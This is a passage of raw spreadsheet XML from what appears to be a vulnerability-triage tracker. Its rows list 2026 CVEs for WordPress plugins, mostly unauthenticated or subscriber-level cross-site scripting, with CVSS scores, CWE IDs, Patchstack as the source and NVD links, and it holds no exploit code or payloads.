        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93514</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Notification for Telegram &lt;= 3.5.2 versions.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93514</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93770</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WP Statistics &lt;= 14.16.13 versions.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93770</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94078</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Site Reviews &lt;= 8.3.1 versions.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94078</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94081</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WordPress Persistent Login &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94081</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94171</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in CURCY &lt;= 2.2.16 versions.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94171</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94499</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in FormGent &lt;= 1.12.2 versions.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94499</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96351</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Classified Listing &lt;= 6.1.3 versions.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96351</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96352</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in YITH WooCommerce Ajax Search &lt;= 2.28.0 versions.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96352</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96814</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WooCommerce Product Table Lite &lt;= 5.6.7 versions.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96814</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96816</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Trusted Shops Easy Integration for WooCommerce &lt;= 2.0.6 versions.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96816</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96819</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in oik &lt;= 4.15.4 versions.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96819</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96820</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Awesome Support &lt;= 6.3.9 versions.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96820</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96830</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in GiveWP &lt;= 4.16.9 versions.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96830</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96836</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Parsi Date &lt;= 6.3 versions.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96836</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97065</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Happyforms &lt;= 1.26.15 versions.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97065</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97077</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ad Inserter &lt;= 2.8.18 versions.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97077</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97235</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in ThemeREX Addons &lt; 2.45.0 versions.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97235</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97237</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetEngine &lt;= 3.8.14.3 versions.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
